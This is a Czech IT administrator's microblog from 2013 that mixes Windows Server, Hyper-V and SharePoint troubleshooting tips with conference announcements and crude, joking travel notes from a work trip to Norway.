Tak pomalu konci muj tyden stravovani u macdonalda. Musim rict ze tu v norsku je to fekal. Maximum fekal. U nas je mekac pomerne luxusni restaurace s kafeem. Tu je to nejlevnejsi pajzl, levnejsi nez kebab. A taky je to primerene poznat na zakosich. Za celou dobu sem takovy lidi na ulici nepotkal, zrejme se zdruzujou jen v mekaci. Popravde sem si dycky koupil burgra a rychle vypadl, protoze se po me hladove divali. Jo a uvnitr se misi puch tech typu s nahulenim - tu prakticky nedite ze by nekdo kouril, zato ve vchodu do meka vsichni a pekne to tahne dovnitr. Fuuuuj. Tesiiim se do svyho cistyho a vonavyho ceska.
5.12.2013 19:27
Nadhera, vybehl jsem si z bergenu na kopec s krasnym, byt nocnim rozhledem, 450mnm. A ted du na cheeseburgea :-)
5.12.2013 14:12
máme tu vichr jako prase, hladina moře se zvedla o metr. paráda. letadla pořád odlétají, doufejme že jim to vydrží až do zítra :-(
5.12.2013 10:08
nechápu, čím se tu stravují - ke snídani studený vajca, k obědu studený bagety, k večeři jalová vodová polívka bez pevných kousků, naštěstí aspoň trošku teplá. jedinej pořádně teplej žvanec co sem zatím měl byl čízburgr :-)
4.12.2013 13:34
google streetview je pěkná věc, ale pro norsko totálně nepoužitelná. ti blbci to totiž všechno vyfotili přes den. v norsku? kdy se člověk po norsku pohybuje přes den? slunce vychází v 10, zapadá ve 14, normální lidi tu žijí v noci. Akorát to prostě nejde přepnout na noční vidění :-(
3.12.2013 21:35
K veceri jsem mel chrestovou polivku, ne ze by sla poznat v te vode nejaka chut, ale hadejte, jak jsem to poznal?
3.12.2013 18:13

pokud používáte Hyper-V replikaci a ověřujete se pomocí TLS/SSL ceritfikátu, tak si raději přepněte službu Hyper-V Virtual Machine Managemt (VMMS) tak, aby startovala Automatic (Delayed). Při restartu totiž ten blbec startuje moc brzo a je možné, že v tom okamžiku ještě není schopen ověřit platnost certifikátu (CRL cesta – the revocation function was not able to check certificate revocation). V tom okamžiku nezapne replikaci, certifikát nepoužije a navíc je takový kretén, že to nezkusí znovu sám za pár minut, ale musíte přijít a tu službu restartovat růčo. Peklo.

2.12.2013 8:57

v 9 nám začíná svítat

1.12.2013 21:25
a poslední dnešní hláška: právě si listuju wifinama a v seznamu je wifina nazvaná "lick my balls"​
1.12.2013 21:24
a jako dezert jsem si koupil (zmensenou verzi, jen 65gramu) svoji oblibenou ritter sport za 100 czk a ostychave si vychutnavam jeden z 12 kousicku. Musim si to rychle utrhnout od huby, tohle mam na cely tyden. Planuju ze jak dorazim dom, koupim si tri cele velke a na miste je zadavim! Zabinkovi sem slibil pohled, tak to napisu a jdu spat.
1.12.2013 21:24
... ceny v mac donaldu stejny jako u nas, bohuzel v nokach, tzn jen 3,3 vetsi. Kebabek s kukurici??? Za lidovych 270 CZK. Ale objevil jsem prave cim se budu cely tyden zivit - cheesburger stoji jenom 33 CZK, jeste ze sem si vzal bezecky vybaveni :-)
1.12.2013 19:46
... hotel za pouhych 4500 CZK na den, tak aspon ze v cene je i vecere :-) ale ne o vikendu :-( jdu si koupit rohlik a burta.
1.12.2013 19:23
... litr benzinu 49,- CZK, norkove zrejme nechapou pojem jizdni pruhy, ridic busu nezna cervenou, nebo mozna pro ne neplati :-) ...
1.12.2013 18:44
... zadny snih, pocasi jak u nas, norky skaredy jako vzdycky, ridic v buse mluvi anglicky, nemecky a francouzsky (a teda zrejme norsky, ale to nepoznam :-)) ...
1.12.2013 18:39
Letiste bergen - placenej inet i v tomhle socialistickym raji. Jizdenka busem do mesta, bratru 90 noku tzn 310 CZK. Aleeee co jeeee kuuuul, bus obsahuje free wifi.
1.12.2013 14:24
Hacker nad hackery - sice pisou, ze frankfurti wifi vydrzi jen 30 minut, ale kdyz zadam jiny ze svych mailu, tak jedu dal. To bylo tezke :-)
1.12.2013 13:40
Klobaska ve frankfurtu me zpravila naladu a ani sem se nepobrindal hortici
1.12.2013 13:26
Fekal hardkor. Uz vim, proc je dobry sedet v letadle u vokna. Ale je teda pravda, ze nechapu, proc ta krava musela tim svym blitim pocakat obe strany ulicky. Tentokrat poslouzila i pritomnost jakesi korpulentni dederonky na sedadle vedle, coz by me normalne dost stvalo, ale jeji obri uces vychytal vetsinu pevnejch kousku.
1.12.2013 9:48
Ode dneska litam uz jenom z vidne - vsude free wifi a stolecky se zasuvkama zadarmo. Parada!
1.12.2013 7:08
Na ceste do norska, prave mijime Mikulov a odjizdime z meho milovaneho ceska. Uz tak je to opruz, byt 6 dnu sam v cizine a to sem jeste zapomnel doma kameru, kurva.
28.11.2013 15:57
​Backup exec na windows 2012 failer clusteru zatuhava celou masinu a vyzaduje tvrdy restart
22.11.2013 10:45
Moje prezentace za poslední dobu jsou všechny k dispozici zde: http://www.sevecek.com/Presentations
22.11.2013 0:46
booože, MS si prostě nedá pokoj s tím nepřetržitým přejmenováváním, aby se člověk nenudil. Celkem mě to ale oprudilo, když jsem teď v 0:45 hledal v menu na Windows 2012 R2 Hyper-V volbu "snapshot" a ono se to teď jmenuje "checkpoint".
21.11.2013 15:44
o.
19.11.2013 10:47
miluju javu: https://forums.oracle.com/message/11247553
19.11.2013 8:49
ti američani musí mít úplně vygumované mozky - se nedivím, že tam každej odposlouchává každého - pokud jsou ochotni si připojit svůj osobní počítač do firemní/školní domény - "Allows you to join a domain so that you can connect to your corporate or school network."
15.11.2013 8:08
perlicka, tak uz i cisco http://www.networkworld.com/news/2013/101713-cisco-nsa-backdoor-274965.html
14.11.2013 20:25

přidal jsem si novou kategorii (Anti)hacking a rovnou jsem do ní vložil několik existujících článečků.

14.11.2013 8:19

hurá, konečně je k dispozici RSAT pro Windows 8.1

13.11.2013 10:04

prislo mejlem ohledne meho posledni clanku o vykradani hesel:

 

Ale mne se to zrovna hodi jako dalsi argument, proc nemaj ani programatori a admini delat pod adminskejma pravama. Samozrejme to vzbuzuje docela velkej odpor. Ja uz teda adminsky prava na beznym uctu nemam ani v praci ani doma a neni to vubec problem. Programatori teda dostanou taky dalsi ucet s adminem.

 

No a cipovku pro vsechny lidi i pro beznej ucet uz jsem prosadil. Zatim teda pro zjednoduseni jen z domova, z prace by furt slo i heslo. Casem treba ani to ne. Vsichni krome programatoru maj uz par let aktivni SRP, tak to je v poho. Takze ke zhruba 100 cipovkam nakoupit dalsich asi 50 :)

12.11.2013 17:10

moje slajdy ze včerejších GOPAS Raňajek najdete zde: http://www.sevecek.com/presentations/GopasRanajky

8.11.2013 12:48

http a https mixed content: zkusíme absolutní odkaz na https://www.google.com a potom obecný odkaz na //www.google.com

7.11.2013 7:14
Dnesni zpravy: v nemocnici zaplatite 60,- za den, deti to maji zadarmo. To je jak reklama na pobyt v nemocnici pro deti. All inclusive, lepsi nez pionyrskej tabor, zadny latriny splachovaci zachody a kakao s loupackem
6.11.2013 1:01

a další WUG SK se nám urodil v Trenčíně, a to hned teď v pondělí 11.11. ještě na poslední chvíli.

4.11.2013 19:52

uj, úplně jsem přehlédl v mailu – musím prozkoumat, to nevypadá vůbec dobře:

novy IE11 zmenil AGENT-STRING, takze ho nepoznají ani nektere Microsoft web aplikace a nefunguji /třeba Exchange 2010 Outlook Web Access [OWA]/ ;o((

http://www.itwire.com/opinion-and-analysis/the-wired-cio/61955-windows-81-internet-explorer-11-incompatibility-with-exchange-server-owa

me Compatability nepomaha, jen ten InPrivate browsing

4.11.2013 19:51

a) WUG SK - Bratislava - 14.11. - Čtyři problémy AD replikací a jak se jim vyhnout

b) WUG CZ - Praha - 11.12. - Vzdálený přístup (VPN a DirectAccess) a přihlašování pomocí certifikátů

už se těšíííím

31.10.2013 20:43
přišlo mailem - http://en.wikipedia.org/wiki/Norton_DNS
Zkuste si doma nastavit jejich DNS, vypadá to jako další úroveň ochrany a navíc zdarma (pro domácí použití). Nezkoumal jsem, kolik to stojí pro firmy.

Moje reakce: nebo další úroveň NSA fejkování? :-)
31.10.2013 14:25
To se zase jednou povedlo: KB2765260 - Nástroj pro přípravu výrobků v SharePoint Server 2013 nemusí průběhu minulých. Tak to jo, jasně, prostě nemusí.
29.10.2013 15:18
Příští týden přednáším kurz GOC173 - podnikové PKI - v GOPASu v Bratislavě! Ještě pořád je možnost se přihlásit.
25.10.2013 8:02

moji prezentace What would a real hacker do to your AD z konference HackerFest 2013, kterou pořádal GOPAS najdete zde:

 

http://www.sevecek.com/presentations/HackerFest2013

24.10.2013 8:41
tak to je paráda. Mám tu 17 000 a potřebuju jejich členství ve skupinách vyexportovat do LDF. Jenže ouha, ten debil není schopen nahradit (pomocí parametru -C) jejich DN na DC=x. Tedy nahrazuje v pohodě, pokud to DN je uvedeno normálně v US-ASCII. Ale pokud to je zrovna Base64 zakódované kvůli nějakým regionálním znakům, ani prd.
21.10.2013 6:00
18.10.2013 8:13
tu je vylepšená verze, aby se tam nedaly zadat hodnoty větší jak 255:

(?:(?:\d|\d\d|0\d\d|1\d\d|20\d|21\d|22\d|23\d|24\d|250|251|252|253|254|255)\.){3}(?:\d|\d\d|0\d\d|1\d\d|20\d|21\d|22\d|23\d|24\d|250|251|252|253|254|255)
18.10.2013 8:01
regex na porovnání IP adresy vypadá takto - tedy pokud je to v řetězci pouze samo o sobě, jinak byste museli vynechat ty okraje \A a \Z:

\A(?:\d{1,3}\.){3}\d{1,3}\Z
15.10.2013 7:49

Dorazilo mailem:

 

Jak jsi mluvil na MS Festu o útoku na heslo pomoci bruteforce na grafikách tak jsem dnes shodou okolností narazil na tento článek http://www.zive.cz/clanky/tezba-kryptomen-je-novodoba-zlata-horecka/jak-tezit-efektivne/sc-3-a-170137-ch-88252/default.aspx. Je sice o něčem trošku jiném, ale v podstatě distribuuje výpočty na GK u mnoha lidí a teorie o 100 a více výkonných GK je možná blíže než by se zdálo. Copak ti lidé (těžaři) vědí co jejich GK počítají? Dostávají peníze za výpočetní výkon a víc je nezajímá.

14.10.2013 21:59
Cajovna s pekarnou? To je uz skoro jako Lidl :-)
14.10.2013 10:47

moje prezentace z konference MS Fest 2013 byly právě aktualizovány a najdete je zde: http://www.sevecek.com/presentations/msfest2013

13.10.2013 17:21

Děkuji VaškoviB že mi poslal tenhle úžasný odkaz:

 

http://www.youtube.com/watch?v=bKgf5PaBzyg

12.10.2013 22:43
Pan mcaffee rika:

"I'm constantly under attack, yet I use no software protection.

"I protect myself by constantly changing my IP [internet protocol] address, by not attaching my name to any device I use, and by not going on to sites where you might pick up a virus.

Se zhulil? Jak se chrani tou zmenou IP adresy?

10.10.2013 11:22
http://technet.idnes.cz/sonda-juno-nouzovy-rezim-0hy-/tec_vesmir.aspx?c=A131010_100409_tec_vesmir_vse

no co, nějakej ufon stisknul čudlík StandBy
8.10.2013 9:51
už v neděli MS Fest a moje 4 přednášky v Brně, v pondělí 21.10. následuje GOPAS HackerFest v Praze a 28.10. mám v Bratislavě GOPAS raňajky!
8.10.2013 9:07

malinka aktualizace materialu ke kurzum goc171 a goc173

1.10.2013 8:15
pro dnesek jen rychlovecka - jak spustim nejaky exe program z PowerShell s prazdnym argumentem? Napriklad bych potreboval spustit toto:

CERTUTIL -setreg CA\CRLPublicationURLs ""

V jazyce PowerShell to ale ten parametr vubec nepreda. Musi se to tedy obalit do apostrofu:

CERTUTIL -setreg CA\CRLPublicationURLs '""'
27.9.2013 8:03
Konferenční podzim se rozjíždí. Nejprve MS Fest v Brně 13.10., potom MS Fest v Praze 3.11. a následuje Microsoft TechDays v Bratislavě 22.11.
24.9.2013 6:40
po prvotním nadšení nad D1 expresem se posledních pár měsíců internet zhoršuje mílovými kroky. teďka už vypínám wifi na celou cestu a mobiluju úspěšněji na Edge. peklo.
20.9.2013 14:19
no čím to je asi způsobeno, že iPhone odesílá smsky do británie? tahle chybka se jmenuje NSA: http://mobil.idnes.cz/ios7-skryte-sms-do-anglie-0xe-/iphone.aspx?c=A130920_121532_iphone_apo
19.9.2013 20:40
to je zajimave, NetBIOS jmeno domeny sice muze obsahovat cislice, klidne i na zacatku, jako treba 3TI, ale nemuzete udelat NetBIOS jmenem domeny, ktere by bylo jen z cisel :-)
19.9.2013 6:29
dříve Customer Experience Improvement Program (CEIP), dnes CIA Experience Improvement Program (CEIP).
18.9.2013 7:42
Proc by MS prilis testoval zaplaty? - http://www.aidanfinn.com/?p=15507 - Cim mene testu, tim vic trablu pro adminy, tim vic zajemcu o MS cloud, tim vic dat pro NSA.
14.9.2013 9:52
regulární výraz na matchnutí FQDN: (?:[a-zA-Z0-9-]+\.)*[a-zA-Z0-9-]+
12.9.2013 11:34
Kamarád mě upozornil na to, že CZ.NIC dělá "zadarmo" projekt distribuovaného firewallu - https://www.turris.cz/
12.9.2013 11:27
GOPAS pořádá seminář na téma hybridní vs. privátní cloud - viz. http://www.gopas.cz/Novinky/Seminar-na-tema-hybridni-privatni-cloud.
Jak by mohlo být patrno už rovnou i z názvu, seminář jenom o Office365 to nebude, což je pochopitelné, protože to nikoho ani nezajímá :-) Takže se přijďte poučit, co ten Microsoft pořád myslím tím privátním cloudem. Martin Pavlis vám to vysvětlí tak, že se toho už bát nebudete a uvědomíte si, že nejde ve skutečnosti o nic jiného, než jenom marketingové slovo, které někdo marketingařům v MS poradil a oni to teď používají, aniž by vůbec tušili, co blábolí.
11.9.2013 9:51
následující přišlo dneska od kámoše. Já k tomu jenom dodám, že kdo byl kdy v Americe, jeho otisky prstů stejně už mají. Akorát to teď budou schopni spárovat i s telefonem :-)

 "Samotný senzor pořizuje velmi detailní snímky vašeho prstu. Ti, kdo se obávají o své soukromí, mohou zůstat v klidu, Apple se dušuje, že tyto obrázky nebudou nikdy uloženy na serverech společnosti, přístup k nim budete mít pouze vy prostřednictvím vašeho zařízení..."
http://www.mobilmania.cz/clanky/iphone-5s-ctecka-otisku-touch-id-v-detailech/sc-3-a-1324737/default.aspx

A tomu dneska ještě někdo věří? :) Nedivil bych se, kdyby se ty otisky ukládaly rovnou do databáze FBI...
6.9.2013 8:43
můj včerejší mailový rozhovor s kamarádem:

On: Ty ještě koukám nemáš web na IPv6 ... 100 let za vopicema, dyť to říkám :)
Ze ----.cz jsem teda musel AAAA sundat, pač asi neběží konektivita od ISP.

Já: Seš holt ješte 100 let před vopicena :-)
5.9.2013 15:59

USB over Network má parádní support. Máme řádně koupeno s podporou a novými verzemi do konce roku 2013. Stáhl jsem tedy novou verzi 5.0, přeinstaloval (2x restart, paráda) a nelze zadat starý licenční klíč z původní verze 4.x s hláškou „incompatible license key“. Paráda. Takže vyplním support formulář u nich na webu. Nic. Za 8 hodin jim pošlu mail. Nic. Tak jsem přispěl ještě do diskuze a uvidíme. Zatím je to 2 dny od incidentu.

4.9.2013 10:55

Pokud vám USB over Network nechce a nechce nasdílet nějaké USB zařízení – nebo lépe řečeno, není vidět na klientovi a není ho možno připojit, zatímco na serveru vidět je – tak si vlezte na serveru do Device Manageru a to zařízení tam pravým tlačítkem odinstalujte. Tím nic nezkazíte, protože ono by se znovu hned detekovalo zpět, ale rozhodně tím právě umožníte, aby USB over Network to zařízení „podchytilo“ a korektně pod něho vložilo svůj vlastní ovladač. Restart počítače nestačí.

3.9.2013 23:47

hustýýý (jak by řekl můj Janek, teda nevím, jestli by to řekl v téhle souvislosti) dneska gůgluju jak se rychle vymažou všechny protokoly událostí a najdu svůj blog :-)

3.9.2013 23:41

tak já bych byl taky klidně pro, aby si mě někdo koupil za 5 400 000 000 EUR. Klidně vám dám i slevu, prodám rád veškerá práva na svoje jméno i přezdívku :-)

3.9.2013 5:48
Nokia by Microsoft, jak asi kazdy predpokladal :-)
2.9.2013 18:58

a v bleskové reakci na můj sen o armagedonu mi tu přišla zpráva z dobře informovaného zdroje, že ani s Office 365 to Microsoft možná nemyslí zas až tak vážně, jak to právě teď možná vypadá ...

2.9.2013 12:34

tu je bleskový návod, jak slušně nainstalovat Western Digital SES ovladače (například na USB harddisk WD My Book Essential, nebo WD My Passport apod.). Ty prasata, jak jsem tu již jednou uváděl, dodávají MSI balíček, které si můžete taky stáhnout u nich na webu. Nechat si nějaký MSI instalátor sahat na serverový systém, tak to fakt ne. Takže jsem si to naintaloval do izolované virtuálky. Bez ohledu na to, co vyberete za instalační cestu, nacpe to rovnou do Program Files\WDCSAM a pak ještě do DriverStore. Ale tam mě to nezajímá. Takže tohle udělejte do testovací VM. Vezměte si potom z toho Program Files adresáře WDCSAM všechny ty soubory (INF, SYS) a překopírujte si je na živý systém.

A v konzoli Device Manager kliknete na to nefunkční zařízení nazvané WD SES Device USB Device se žlutým vykřičníčkem a prostě necháte ovladače zaktualizovat z toho adresáře, kam jste si předtím INF a SYS soubory překopírovali. Nejnovější verze je z roku 2011, co jsem našel.

2.9.2013 12:21

a aby toho nebylo málo s Western Digital Essential USB HDD, tak ten ptáček sice instaluje ovladače pomocí MSI a ptá se vás na instalační cestu, ale pak to stejně hodí úplně do jiného adresáře WDCSAM. Tak to je prostě ukázka kvalitního indickýho superprogramátora.

 

2.9.2013 8:52

to si dělá Western Digital srandu? dodávat ovladače k tomu svému USB harddisku? proč to nemají ve Windows? to bude nějaká prdel, zřejmě. A teď to stáhnu a vidím, že to prdel nebyla. Dokonce se zbláznili úplně a dodávají .MSI. Prasata. Skončil jsem s WD. Děkuji. Sbohem.

 

29.8.2013 12:09
Podle zpravy od US Department of Defence, 79% utoku na mobily bylo na Android. To je necekanej zaver. Vzhledem k jejich market sheru je to uplne presna statistika :-)
29.8.2013 9:05
Win 8.1 RTM!!! bude k dispozici az 18.10.2013, do te doby udajne jen OEM.
28.8.2013 18:30

kontrola hodnoty PSČ v SharePoint sloupečku: =AND(ISNUMBER(VALUE(LEFT(PSČ,3))),ISNUMBER(VALUE(RIGHT(PSČ,2))),MID(PSČ,4,1)=" ")

28.8.2013 12:09

Naše letošní videa z konference ShowIT 2013 SK pomalu, ale jistě přibývají ke všem, které tam jsou z loňských ročníků také.

 

28.8.2013 8:40

jsem to vždycky říkal, že ty „moderní“ USB síťovky na VMWare mi TMG blokují na půl hodiny během restartu. A je to tak! Opět platí, hot-plug support je cena za serverovou nekompatibilitu. Pryč s VMWare!

 

Proč tuhle vymoženost Hyper-V nemá asi nebude úplně samo sebou.

27.8.2013 19:39
Tak Lync ta prašivá mrcha má cache Autodiscover v registrech - HKCU\Software\Microsoft\Communicator\<sip>\Autodiscovery a potom jeste HKCU\Software\Microsoft\Office\15.0\Lync\<sip>\Autodiscovery
Pryč s tím svinstvem!
27.8.2013 17:02
Multimedia keyboard with 12 HOT keys? Spalim si prsty, nebo vyskoci nejaky lechtivy obrazky? :-)
27.8.2013 11:17

přesměrování složek ve Windows 7 zřejmě vyžaduje, aby uživatel byl vlastníkem těch přesměrovaných složek, pokud už existují v okamžiku, kdy se to na stanici zapíná. Pokud neexistují, tak si je to založí automaticky v pořádku. Ale pokud na serveru už jsou, musím být jejich vlastníkem. Od okamžiku, kdy se to zapne už vlastnictví nerozhoduje, ale Win7 prostě odmítají to přesměrování zapnout, pokud nejsou vlastníkem. Podivné...

25.8.2013 11:04

uf, tak po 6 hodinách ladění instalace SP2 na můj SharePoint jsem vyřešil chybovou hlášku „SyncUpgradeTimerJob. Sleeping for 10 seconds. SPTIMERv4 is not running anymore. Return -1. The exclusive inplace time job failed.“ tak, že jsem prostě čekal v logu, až se tam objeví ta hláška o čekání 10 sekund a prostě jsem SharePoint Timer service nastartoval ručně a fíha, všecko doběhlo jak mělo.

23.8.2013 12:07

­­Zemanova cukrárna na Josefské sice vykazuje všechny znaky socialistického skanzenu, ale větrník byl dneska naprosto dokonalý, s pěkně navlhlým spodkem, tak to je správné, tak to má byt.

22.8.2013 22:26
Kuul fíčura jak stahovat a synchronizovat soubory přes HTTPShttp://feedly.com/k/15WGE1q
22.8.2013 19:01

Do háje, msDS-PrincipalName, které automaticky generuje login pro foreignSecurityPrincipal je k dispozici jako computed (constructed) atribut až od Windows 2008. škoda. bude to ještě trošku dřina :-)

18.8.2013 11:13

File Server Resource Manager (FSRM) zřetelně nemá problém se 120 000 quota položkami. Jenom zobrazení, pokud nemáte nějaký filtr, trvá přesně 23 minut :-) Trošku nevýhoda je, že ten filtr nejde změnit dopředu, ale musíte počkat, než se to všechno načte a až potom ho můžete změnit. V paměti služby těch 120 000 položek žere jen 600 MB :-), což taky není nic zásadního. Naprostá spokojenost.

17.8.2013 16:56

magický článek řešící všechny problémy typu „nelze odstranit IP adresa“, „není vidět nastavení IPv4 v GUI síťovky“ apod.: How to reset Internet Protocol (TCP/IP) KB 299357

17.8.2013 16:24
uf, naštěstí existuje cmdlet Convert-VHD, kterým se dá překonvertovat VHDX zpět do VHD
17.8.2013 13:31
mám podezření, že politika "Accounts: Administrator account status" nefunguje. Buď je to tím, že mám toho výchozího (-500) admina přejmenovaného, nebo že to prostě jenom tak nefunguje. Je potřeba použít Group Policy Preferences, ve kterých to funguje spolehlivě.
17.8.2013 8:14
dva poznatky:
a) nabizet v kavarne snidane az od 10:00 me pobavilo
b) sedet v kavarne na snidani je prijemne, krom faktu, ze jediny kdo tu sedi se mno jsou duchodci. Priste pujdu na snidani do hotelu :-)